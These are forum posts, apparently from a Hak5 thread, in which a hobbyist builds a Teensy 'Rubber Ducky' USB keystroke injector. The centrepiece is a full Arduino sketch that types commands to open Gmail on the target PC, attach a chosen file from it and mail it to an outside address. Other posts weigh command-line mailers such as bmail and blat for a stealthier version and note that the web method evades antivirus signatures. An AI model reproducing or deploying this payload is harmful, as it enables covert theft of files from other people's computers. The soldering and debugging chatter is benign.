HoboCop

Well, why re-invent the wheel if you don't have to? Almost embarrassingly, it dawned on me that the hacksaw managed to pull off nabbing files via google's smtp many moons ago. I never played with the hacksaw when it originally came out, but it appears the missing link to my ssl problem could be stunnel. Now, I don't know a damned thing about using this program [yet], but I guess it's time to learn. That being said, it's becoming clear at this point that using the card reader attachment has become a necessity in order to deliver the payload of programs required to pull this off via cmd. This kind of thwarts my original inspiration for using the web interface; no executables = no AV signature. But that's another story, I suppose...

Haven't done this to mine (although I might try it now for kicks), but check this out...

I'm sure it's just a disposable address, I mean it's not like he created it using his full name or anyth... oh, um, wait,... yeah...

Ok, back from the beach and here's where I'm at. Regarding the web interface, I am experiencing some complications regarding the last set of "tabs" to navigate to the send button. Strangely, when I add in the tabs at the end it throws off the timing for the whole script prior to that. Very strange indeed. So I'm still working on that... As far as the cmd version goes: I have found two possible programs to send an attachment from the windows command line. The first is called bmail. The sweet thing about this is that it's only 17K! I cant remember off the top of my head, but this may be small enough to fit on the teensy in disk mode without an sd reader attached. The second one is called blat. This one is much larger, but it seems to be geared more specifically towards sending file attachments from the command line. We'd have to rock the card reader attachment with this one. Here's the snag with both, neither appears to support ssl so connecting to gmail and I believe yahoo, hotmail etc appears to be out as they require ssl from what I've read. Sooo, the question to my hak5 friends out there is this; Anyone know of a free email service that doesn't give a hoot about ssl? (Without using a time machine)

I guess my point is simply that this is project is in it's very early stages and based on the fact that Darren sent out 100 dev kits, I can only hope that we have yet to see what can truly be done with this hardware in the future. Just wishful thinking. But what the hell do I know, I can't even get my ducky mailer to work! :D

Don't take it the wrong way, Wetwork, I think Protocol's just trying to say that buying a teensy directly from pjrc is basically what you're looking for. Unless you plan on adding on a sd card reader, there really isn't anything you need to physically do to get up and running. The customization comes from the code, and at this point things are changing / developing daily, so if you bought one pre-loaded you'd probably want to modify it almost immediately. From what I've seen, no one's really released a killer-app version of the teensy yet, so you might just want to wait until Darren does a show officially unveiling whatever it is that he and Diginina have had up there sleeve for the last year (and you know there's something up there).

Thanks for the info / inspiration, Deevd. I'm on the beach taking Crown shots out of scavenged sea shells right now, but I'll be diving into this tomorrow night.

Quite possibly, but then what would I do with my free time? Jk. Seriously though, I did think of that for about 3 seconds, but I have limited experience with that. So I decided to jusit play around with the web interface. I'm definitely interested in learning how to do it via cmd as well, as it could be much more stealty and quick.

Thanks, Protocol, but unfortunately I got a compiling error when attempting to use MODIFIERKEY_TAB as only shift, ctrl, alt and GUI are listed as valid modifiers. I may just have to manually tab there as I did with the other steps, but I was trying to avoid it as it looks like it's going to take 30 tabs to navigate there. I'll play around with it some more tomorrow.

I thought it would be simple enough to add the gmail shortcut for "send" to the above code (as of now it stops after selecting the target file), but it turns out that the keyboard shortcut is TAB + ENTER. Unfortunately TAB doesn't appear to be a valid modifier key. Anyone have any ideas on how to achieve this?

Pretty sweet shiznit, I.G., can't wait to play around with some of this. Thanks!

Is this due to a hardware limitation of the teensy, or could it eventually be possible via code to get write access on the teensy 2.0?

Here's a little experiment I've been tinkering with. This code makes the ducky open up gmail (via IE), login, attach a pre-determined file from the target PC, and send it to yourself for later (or any address you want, really). This could be used for collecting the same file from multiple pc's for sys-admins, or you know, other fun stuff. Right now the delays are set longer than necessary for testing purposes as different systems will have longer / shorter load times. With some optimization it could definitely run much faster. Also note that this is set up for a recipient address that is already one of your contacts (yourself in this case), if you want to send it to an address not in your contacts you would have to remove one of the tabs after the address. // "Sticky Feathers" for Rubber Ducky by Sintax77 // Started with the script "DUCKY_WAS_HERE" - as a base for this. (thanks!) int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim ledstart(); // lights up when connected delay(4000); // delay for computer ledstart(); // lights up when payload starts Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); d(); // this is a 100ms delay, see below for commands. Keyboard.print("iexplore.exe www.gmail.com"); // Opens gmail in browser d(); enter(); delay(5000); // delay for browser to load Keyboard.print("username!goes!here"); //Enter you username here Keyboard.send_now(); //possible delay //d(); tab(); Keyboard.print("password!goes!here"); //Enter your password here Keyboard.send_now(); enter(); d(); delay(8000); // delay for gmail page to load Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_key1(KEY_L); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); delay(2000); // delay for IE address input page to load Keyboard.print("https://mail.google.com/mail/?shva=1#compose"); //type address to compose new e-mail Keyboard.send_now(); enter(); d(); delay(2000); // Keyboard.print("vampiretap"); //first part of destination address Keyboard.send_now(); delay(400); Keyboard.set_modifier(MODIFIERKEY_SHIFT); //hold shift + 2 for the @ symbol Keyboard.send_now(); Keyboard.set_key1(KEY_2); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); Keyboard.print("gmail.com"); //second part of destination address Keyboard.send_now(); delay(800); tab(); delay(800); //tab(); delay(800); tab(); Keyboard.print("example subject"); //type subject here Keyboard.send_now(); delay(400); tab(); delay(200); Keyboard.print("message body"); //type message body here Keyboard.send_now(); delay(400); tab(); delay(200); tab(); delay(200); tab(); delay(200); tab(); delay(200); tab(); delay(200); tab(); delay(400); enter(); delay(4000); Keyboard.print("path to target file"); //type file path here Keyboard.send_now(); } void loop() { // Maybe a flashing LED? } void enter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void tab() { Keyboard.set_key1(KEY_TAB); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void sendClearKeys() { Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } // LED command for end of script. void ledend(){ Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_modifier(0); Keyboard.send_now(); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); delay (500); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); } // LED command for start of script void ledstart(){ digitalWrite(ledPin, HIGH); delay (1000); digitalWrite(ledPin, LOW); } // delay 100ms void d(){ delay(100); }

OK, confirmed that its was my half-assed soldering that was the issue here. Added some extra solder and it was recognized as a drive without a hitch. My test files that I dropped on the card earlier are visible now. On to the next problem, drive is coming up as write protected(?)

Uh-oh, got myself a classic blue screen of death on my Win 7 box. Soldered up the sd adapter. Tested the sd card separately to make sure it was kosher. Also ran some sketches on the newly modded teensy. They ran as they did before (including getting the teensy to show up using the "internal disk" setting. All good so far. Until I tried to run with usb type set to "disk (SD card)", using the "blink" example sketch. Got myself a BSOD the first time, then a windows message telling me card should be formatted the second time (although it never showed up as a drive, like it did using the "disk internal" setting), and on the third go I got a format message followed by BSOD as soon as I canceled the format dialog box. Time to check my solder points, and try again, I guess. :)